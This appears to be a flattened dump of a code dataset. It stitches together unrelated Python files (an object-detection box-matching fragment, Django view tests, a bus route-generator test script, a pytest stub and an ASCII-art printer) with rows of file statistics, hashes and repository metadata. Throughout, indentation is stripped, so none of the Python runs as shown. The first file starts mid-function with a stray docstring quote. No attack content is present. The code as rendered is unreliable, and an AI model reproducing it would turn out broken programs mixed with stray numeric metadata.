best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get maximum overlap value for each default box
# shape = (batch num, dboxes num)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
# object_indices = object_indices.long() # for fancy indexing
# get maximum overlap values for each object
# shape = (batch num, object num)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \
targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 12:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
| 41.45625 | 174 | 0.673903 | 922 | 6,633 | 4.58243 | 0.127983 | 0.033136 | 0.031953 | 0.030296 | 0.962604 | 0.953136 | 0.942959 | 0.942959 | 0.942959 | 0.942959 | 0 | 0.017124 | 0.225237 | 6,633 | 159 | 175 | 41.716981 | 0.80502 | 0.306196 | 0 | 0.692308 | 0 | 0 | 0.01162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.038462 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
7c203ac0f48d46b7efacaa17d6e53845b02eb976
| 7,512 |
py
|
Python
|
cms/tests/test_views.py
|
Ibrahem3amer/bala7
|
70638c121ea85ff0e6a650c5f2641b0b3b04d6d0
|
[
"Apache-2.0"
] | null | null | null |
cms/tests/test_views.py
|
Ibrahem3amer/bala7
|
70638c121ea85ff0e6a650c5f2641b0b3b04d6d0
|
[
"Apache-2.0"
] | null | null | null |
cms/tests/test_views.py
|
Ibrahem3amer/bala7
|
70638c121ea85ff0e6a650c5f2641b0b3b04d6d0
|
[
"Apache-2.0"
] | null | null | null |
from django.core.urlresolvers import resolve
from django.urls import reverse
from django.test import TestCase, RequestFactory
from django.http import HttpRequest, Http404
from django.contrib.auth.models import User
from unittest import skip
from users.models import University, Faculty, Department, UserProfile
from cms.models import Topic
from cms.views import get_topic
class AccessRestriction(TestCase):
def setUp(self):
self.user = User.objects.create(username='test_username', email='tesssst@test.com', password='secrettt23455')
self.uni = University.objects.create(name='test_university')
self.fac = Faculty.objects.create(name='Test faculty')
self.dep = Department.objects.create(name='Test dep')
self.profile = UserProfile.objects.create(university=self.uni, faculty=self.fac, department=self.dep)
self.topic = Topic.objects.create(name='cs', desc="test test test", faculty=self.fac, term=1)
self.topic.department.add(self.dep)
self.user.profile = self.profile
self.profile.topics.add(self.topic)
def test_return_topic_that_match_user(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
response = get_topic(request, self.dep.id, self.topic.id)
# Assert test
self.assertEqual(200, response.status_code)
def test_return_topic_that_has_different_department(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
another_dep = Department.objects.create()
try:
response = get_topic(request, another_dep.id, self.topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_does_not_exist(self):
# Setup test
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
try:
response = get_topic(request, self.dep.id, 990)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_return_topic_that_outside_user_topics(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request, self.dep.id, outsider_topic.id)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
def test_get_topic_with_no_parameters(self):
# Setup test
another_topic = Topic.objects.create(name='is', desc="test test test", faculty=self.fac, term=1)
another_topic.department.add(self.dep)
self.user.profile.topics.add(another_topic)
request = RequestFactory()
request = request.get(reverse('get_topic', kwargs={'dep_id': self.dep.id, 'topic_id': self.topic.id}))
request.user = self.user
# Exercise test
outsider_topic = Topic.objects.create(name='ms', desc="test test test", faculty=self.fac, term=1)
outsider_topic.department.add(self.dep)
try:
response = get_topic(request)
flag = False
except Http404:
flag = True
# Assert test
self.assertTrue(flag)
class TableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='tesssst@test.com', password='secrettt23455')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
self.profile = UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/table_main.html')
def test_page_redirect_on_post(self):
# Setup test
url = reverse('web_dep_table')
request = self.client.login(username="ssss", password="secrettt23455")
# Exercise test
request = self.client.post(url)
# Assert test
self.assertEqual(302, request.status_code)
def test_page_redirect_on_no_profile(self):
# Setup test
user = User.objects.create_user(
username='test_username',
email='tesssst@test.com',
password='secrettt23455'
)
url = reverse('web_dep_table')
request = self.client.login(username="test_username", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(302, request.status_code)
class UserTableViews(TestCase):
def setUp(self):
self.user = User.objects.create_user(username='ssss', email='tesssst@test.com', password='secrettt23455')
self.fac = Faculty.objects.create()
self.dep = Department.objects.create(faculty=self.fac)
UserProfile.objects.create(user=self.user, department=self.dep, faculty=self.fac)
self.topic = Topic.objects.create(name='topic name', desc='ddddd', term=1)
self.topic.department.add(self.dep)
def test_page_load_on_get(self):
# Setup test
url = reverse('web_user_table')
request = self.client.login(username="ssss", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_page_load_if_no_profile(self):
# Setup test
url = reverse('web_user_table')
another_user = User.objects.create_user(username='xxxss', email='tesssst@test.com', password='secrettt23455')
request = self.client.login(username="xxxss", password="secrettt23455")
# Exercise test
request = self.client.get(url)
# Assert test
self.assertEqual(200, request.status_code)
self.assertTemplateUsed(request, 'tables/user_table.html')
def test_post_when_no_choices(self):
# Setup test
url = reverse('web_user_table')
data = {}
request = self.client.login(username="xxxss", password="secrettt23455")
# Exercise test
request = self.client.post(url, data=data)
# Assert test
self.assertEqual(302, request.status_code)
| 36.823529 | 117 | 0.651092 | 914 | 7,512 | 5.221007 | 0.12035 | 0.059933 | 0.042749 | 0.01907 | 0.836337 | 0.774728 | 0.741199 | 0.733655 | 0.683152 | 0.624686 | 0 | 0.017413 | 0.23549 | 7,512 | 203 | 118 | 37.004926 | 0.813512 | 0.054047 | 0 | 0.618321 | 0 | 0 | 0.097426 | 0.009333 | 0 | 0 | 0 | 0 | 0.10687 | 1 | 0.10687 | false | 0.083969 | 0.068702 | 0 | 0.198473 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 6 |
7c2db7d1e1ec02302af64420555ad08513981b88
| 18,565 |
py
|
Python
|
tests/route_generator_test.py
|
CityPulse/dynamic-bus-scheduling
|
7516283be5a374fe0a27715f4facee11c847f39f
|
[
"MIT"
] | 14 |
2016-09-24T11:42:48.000Z
|
2021-06-11T08:06:23.000Z
|
tests/route_generator_test.py
|
CityPulse/CityPulse-Dynamic-Bus-Scheduler
|
7516283be5a374fe0a27715f4facee11c847f39f
|
[
"MIT"
] | 1 |
2016-07-08T09:16:42.000Z
|
2016-07-08T09:16:42.000Z
|
tests/route_generator_test.py
|
CityPulse/dynamic-bus-scheduling
|
7516283be5a374fe0a27715f4facee11c847f39f
|
[
"MIT"
] | 5 |
2016-06-17T12:46:28.000Z
|
2021-09-25T19:04:37.000Z
|
#!/usr/local/bin/python
# -*- coding: utf-8 -*-
"""
- LICENCE
The MIT License (MIT)
Copyright (c) 2016 Eleftherios Anagnostopoulos for Ericsson AB (EU FP7 CityPulse Project)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
- DESCRIPTION OF DOCUMENTS
-- MongoDB Database Documents:
address_document: {
'_id', 'name', 'node_id', 'point': {'longitude', 'latitude'}
}
bus_line_document: {
'_id', 'bus_line_id', 'bus_stops': [{'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}}]
}
bus_stop_document: {
'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}
}
bus_stop_waypoints_document: {
'_id', 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[edge_object_id]]
}
bus_vehicle_document: {
'_id', 'bus_vehicle_id', 'maximum_capacity',
'routes': [{'starting_datetime', 'ending_datetime', 'timetable_id'}]
}
detailed_bus_stop_waypoints_document: {
'_id', 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[edge_document]]
}
edge_document: {
'_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'max_speed', 'road_type', 'way_id', 'traffic_density'
}
node_document: {
'_id', 'osm_id', 'tags', 'point': {'longitude', 'latitude'}
}
point_document: {
'_id', 'osm_id', 'point': {'longitude', 'latitude'}
}
timetable_document: {
'_id', 'timetable_id', 'bus_line_id', 'bus_vehicle_id',
'timetable_entries': [{
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'departure_datetime', 'arrival_datetime', 'number_of_onboarding_passengers',
'number_of_deboarding_passengers', 'number_of_current_passengers',
'route': {
'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
'distances_from_starting_node', 'times_from_starting_node',
'distances_from_previous_node', 'times_from_previous_node'
}
}],
'travel_requests': [{
'_id', 'client_id', 'bus_line_id',
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'departure_datetime', 'arrival_datetime',
'starting_timetable_entry_index', 'ending_timetable_entry_index'
}]
}
traffic_event_document: {
'_id', 'event_id', 'event_type', 'event_level', 'point': {'longitude', 'latitude'}, 'datetime'
}
travel_request_document: {
'_id', 'client_id', 'bus_line_id',
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'departure_datetime', 'arrival_datetime',
'starting_timetable_entry_index', 'ending_timetable_entry_index'
}
way_document: {
'_id', 'osm_id', 'tags', 'references'
}
-- Route Generator Responses:
get_route_between_two_bus_stops: {
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'route': {
'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
'distances_from_starting_node', 'times_from_starting_node',
'distances_from_previous_node', 'times_from_previous_node'
}
}
get_route_between_multiple_bus_stops: [{
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'route': {
'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
'distances_from_starting_node', 'times_from_starting_node',
'distances_from_previous_node', 'times_from_previous_node'
}
}]
get_waypoints_between_two_bus_stops: {
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[{
'_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'max_speed', 'road_type', 'way_id', 'traffic_density'
}]]
}
get_waypoints_between_multiple_bus_stops: [{
'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
'waypoints': [[{
'_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
'max_speed', 'road_type', 'way_id', 'traffic_density'
}]]
}]
"""
import time
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../'))
from src.common.logger import log
from src.common.parameters import testing_bus_stop_names
from src.route_generator.route_generator_client import get_route_between_two_bus_stops, \
get_route_between_multiple_bus_stops, get_waypoints_between_two_bus_stops, get_waypoints_between_multiple_bus_stops
__author__ = 'Eleftherios Anagnostopoulos'
__email__ = 'eanagnostopoulos@hotmail.com'
__credits__ = [
'Azadeh Bararsani (Senior Researcher at Ericsson AB) - email: azadeh.bararsani@ericsson.com'
'Aneta Vulgarakis Feljan (Senior Researcher at Ericsson AB) - email: aneta.vulgarakis@ericsson.com'
]
def test_get_route_between_two_bus_stops(starting_bus_stop=None, ending_bus_stop=None,
starting_bus_stop_name=None, ending_bus_stop_name=None):
"""
:param starting_bus_stop: bus_stop_document
:param ending_bus_stop: bus_stop_document
:param starting_bus_stop_name: string
:param ending_bus_stop_name: string
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='get_route_between_two_bus_stops: starting')
start_time = time.time()
# response = {
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'route': {
# 'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
# 'distances_from_starting_node', 'times_from_starting_node',
# 'distances_from_previous_node', 'times_from_previous_node'
# }
# }
response = get_route_between_two_bus_stops(
starting_bus_stop=starting_bus_stop,
ending_bus_stop=ending_bus_stop,
starting_bus_stop_name=starting_bus_stop_name,
ending_bus_stop_name=ending_bus_stop_name
)
starting_bus_stop = response.get('starting_bus_stop')
ending_bus_stop = response.get('ending_bus_stop')
route = response.get('route')
if route is not None:
total_distance = route.get('total_distance')
total_time = route.get('total_time')
node_osm_ids = route.get('node_osm_ids')
points = route.get('points')
edges = route.get('edges')
distances_from_starting_node = route.get('distances_from_starting_node')
times_from_starting_node = route.get('times_from_starting_node')
distances_from_previous_node = route.get('distances_from_previous_node')
times_from_previous_node = route.get('times_from_previous_node')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\ntotal_distance: ' + str(total_distance) + \
'\ntotal_time: ' + str(total_time) + \
'\nnode_osm_ids: ' + str(node_osm_ids) + \
'\npoints: ' + str(points) + \
'\nedges: ' + str(edges) + \
'\ndistances_from_starting_node: ' + str(distances_from_starting_node) + \
'\ntimes_from_starting_node: ' + str(times_from_starting_node) + \
'\ndistances_from_previous_node: ' + str(distances_from_previous_node) + \
'\ntimes_from_previous_node: ' + str(times_from_previous_node)
else:
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\nroute: None'
print output
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_route_between_two_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
def test_get_route_between_multiple_bus_stops(bus_stops=None, bus_stop_names=None):
"""
:param bus_stops: [bus_stop_document]
:param bus_stop_names: [string]
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='get_route_between_multiple_bus_stops: starting')
start_time = time.time()
route_distance = 0
route_traveling_time = 0
# response = [{
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'route': {
# 'total_distance', 'total_time', 'node_osm_ids', 'points', 'edges',
# 'distances_from_starting_node', 'times_from_starting_node',
# 'distances_from_previous_node', 'times_from_previous_node'
# }
# }]
response = get_route_between_multiple_bus_stops(
bus_stops=bus_stops,
bus_stop_names=bus_stop_names
)
for intermediate_response in response:
starting_bus_stop = intermediate_response.get('starting_bus_stop')
ending_bus_stop = intermediate_response.get('ending_bus_stop')
intermediate_route = intermediate_response.get('route')
if intermediate_route is not None:
total_distance = intermediate_route.get('total_distance')
route_distance += total_distance
total_time = intermediate_route.get('total_time')
route_traveling_time += total_time
node_osm_ids = intermediate_route.get('node_osm_ids')
points = intermediate_route.get('points')
edges = intermediate_route.get('edges')
distances_from_starting_node = intermediate_route.get('distances_from_starting_node')
times_from_starting_node = intermediate_route.get('times_from_starting_node')
distances_from_previous_node = intermediate_route.get('distances_from_previous_node')
times_from_previous_node = intermediate_route.get('times_from_previous_node')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\ntotal_distance: ' + str(total_distance) + \
'\ntotal_time: ' + str(total_time) + \
'\nnode_osm_ids: ' + str(node_osm_ids) + \
'\npoints: ' + str(points) + \
'\nedges: ' + str(edges) + \
'\ndistances_from_starting_node: ' + str(distances_from_starting_node) + \
'\ntimes_from_starting_node: ' + str(times_from_starting_node) + \
'\ndistances_from_previous_node: ' + str(distances_from_previous_node) + \
'\ntimes_from_previous_node: ' + str(times_from_previous_node)
else:
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop) + \
'\nroute: None'
print output
route_average_speed = (route_distance / 1000) / (route_traveling_time / 3600)
print '\nroute_distance: ' + str(route_distance / 1000) + \
' - route_traveling_time: ' + str(route_traveling_time / 60) + \
' - route_average_speed: ' + str(route_average_speed)
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_route_between_multiple_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
def test_get_waypoints_between_two_bus_stops(starting_bus_stop=None, ending_bus_stop=None,
starting_bus_stop_name=None, ending_bus_stop_name=None):
"""
:param starting_bus_stop: bus_stop_document
:param ending_bus_stop: bus_stop_document
:param starting_bus_stop_name: string
:param ending_bus_stop_name: string
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_two_bus_stops: starting')
start_time = time.time()
# response = {
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'waypoints': [[{
# '_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'max_speed', 'road_type', 'way_id', 'traffic_density'
# }]]
# }
response = get_waypoints_between_two_bus_stops(
starting_bus_stop=starting_bus_stop,
ending_bus_stop=ending_bus_stop,
starting_bus_stop_name=starting_bus_stop_name,
ending_bus_stop_name=ending_bus_stop_name
)
starting_bus_stop = response.get('starting_bus_stop')
ending_bus_stop = response.get('ending_bus_stop')
waypoints = response.get('waypoints')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop)
print output
for separate_waypoints in waypoints:
print 'waypoints: ' + str(separate_waypoints)
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_two_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
def test_get_waypoints_between_multiple_bus_stops(bus_stops=None, bus_stop_names=None):
"""
:param bus_stops: [bus_stop_document]
:param bus_stop_names: [string]
"""
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_multiple_bus_stops: starting')
start_time = time.time()
# response = [{
# 'starting_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'ending_bus_stop': {'_id', 'osm_id', 'name', 'point': {'longitude', 'latitude'}},
# 'waypoints': [[{
# '_id', 'starting_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'ending_node': {'osm_id', 'point': {'longitude', 'latitude'}},
# 'max_speed', 'road_type', 'way_id', 'traffic_density'
# }]]
# }]
response = get_waypoints_between_multiple_bus_stops(
bus_stops=bus_stops,
bus_stop_names=bus_stop_names
)
for intermediate_response in response:
starting_bus_stop = intermediate_response.get('starting_bus_stop')
ending_bus_stop = intermediate_response.get('ending_bus_stop')
waypoints = intermediate_response.get('waypoints')
output = '\nstarting_bus_stop: ' + str(starting_bus_stop) + \
'\nending_bus_stop: ' + str(ending_bus_stop)
print output
for separate_waypoints in waypoints:
print 'waypoints: ' + str(separate_waypoints)
elapsed_time = time.time() - start_time
time.sleep(0.1)
log(module_name='route_generator_test', log_type='INFO',
log_message='test_get_waypoints_between_multiple_bus_stops: finished - elapsed_time = ' +
str(elapsed_time) + ' sec')
if __name__ == '__main__':
selection = ''
while True:
selection = raw_input(
'\n0. exit'
'\n1. test_get_route_between_two_bus_stops'
'\n2. test_get_route_between_multiple_bus_stops'
'\n3. test_get_waypoints_between_two_bus_stops'
'\n4. test_get_waypoints_between_multiple_bus_stops'
'\nSelection: '
)
if selection == '0':
break
elif selection == '1':
test_get_route_between_two_bus_stops(
starting_bus_stop_name=testing_bus_stop_names[0],
ending_bus_stop_name=testing_bus_stop_names[1]
)
elif selection == '2':
test_get_route_between_multiple_bus_stops(
bus_stop_names=testing_bus_stop_names
)
elif selection == '3':
test_get_waypoints_between_two_bus_stops(
starting_bus_stop_name=testing_bus_stop_names[0],
ending_bus_stop_name=testing_bus_stop_names[1]
)
elif selection == '4':
test_get_waypoints_between_multiple_bus_stops(
bus_stop_names=testing_bus_stop_names
)
else:
print 'Invalid input'
| 43.579812 | 119 | 0.649609 | 2,183 | 18,565 | 5.066422 | 0.121393 | 0.081013 | 0.061031 | 0.027848 | 0.776763 | 0.764647 | 0.72613 | 0.705244 | 0.70226 | 0.690416 | 0 | 0.003018 | 0.214597 | 18,565 | 425 | 120 | 43.682353 | 0.755504 | 0.094263 | 0 | 0.513228 | 0 | 0 | 0.229712 | 0.101168 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.031746 | null | null | 0.042328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
7c3b8f8f699a46823b3a538245f3bafebd9b481d
| 56 |
py
|
Python
|
12_module_release/message/__init__.py
|
DeveloperLY/Python-practice
|
85062afee1dc6b60b7011b0e3800b65fc9b9e9b2
|
[
"MIT"
] | null | null | null |
12_module_release/message/__init__.py
|
DeveloperLY/Python-practice
|
85062afee1dc6b60b7011b0e3800b65fc9b9e9b2
|
[
"MIT"
] | null | null | null |
12_module_release/message/__init__.py
|
DeveloperLY/Python-practice
|
85062afee1dc6b60b7011b0e3800b65fc9b9e9b2
|
[
"MIT"
] | null | null | null |
from . import send_message
from . import receive_message
| 28 | 29 | 0.839286 | 8 | 56 | 5.625 | 0.625 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 56 | 2 | 29 | 28 | 0.918367 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
7c5bbf4b4ce3af5182a0d6bd6aa48e224f1317d8
| 53 |
py
|
Python
|
test_stock.py
|
ucsb-cs48-w19/6pm-stock-trading
|
daf70b684c15182753d8ca9b820238cf9cd5b75c
|
[
"MIT"
] | 1 |
2019-04-06T15:44:07.000Z
|
2019-04-06T15:44:07.000Z
|
test_stock.py
|
ucsb-cs48-w19/6pm-stock-trading
|
daf70b684c15182753d8ca9b820238cf9cd5b75c
|
[
"MIT"
] | 35 |
2019-03-07T22:29:04.000Z
|
2021-12-13T19:55:51.000Z
|
test_stock.py
|
ucsb-cs48-w19/6pm-stock-trading
|
daf70b684c15182753d8ca9b820238cf9cd5b75c
|
[
"MIT"
] | 1 |
2019-12-18T23:06:37.000Z
|
2019-12-18T23:06:37.000Z
|
import pytest
def test_stock():
assert(0 == 0)
| 8.833333 | 18 | 0.622642 | 8 | 53 | 4 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.245283 | 53 | 5 | 19 | 10.6 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
7c84e9b3f92ddbf93482eff72a312c6afff49d17
| 173 |
py
|
Python
|
Level1_Input_Output/10172.py
|
jaeheeLee17/BOJ_Algorithms
|
c14641693d7ef0f5bba0a6637166c7ceadb2a0be
|
[
"MIT"
] | null | null | null |
Level1_Input_Output/10172.py
|
jaeheeLee17/BOJ_Algorithms
|
c14641693d7ef0f5bba0a6637166c7ceadb2a0be
|
[
"MIT"
] | null | null | null |
Level1_Input_Output/10172.py
|
jaeheeLee17/BOJ_Algorithms
|
c14641693d7ef0f5bba0a6637166c7ceadb2a0be
|
[
"MIT"
] | null | null | null |
def main():
print("|\_/|")
print("|q p| /}")
print("( 0 )\"\"\"\\")
print("|\"^\"` |")
print("||_/=\\\\__|")
if __name__ == "__main__":
main()
| 17.3 | 26 | 0.352601 | 14 | 173 | 3.5 | 0.571429 | 0.408163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007937 | 0.271676 | 173 | 9 | 27 | 19.222222 | 0.380952 | 0 | 0 | 0 | 0 | 0 | 0.289017 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0 | 0 | 0.125 | 0.625 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0
| 6 |
7c9ab847564a9551bd26274412cd272cd155cf72
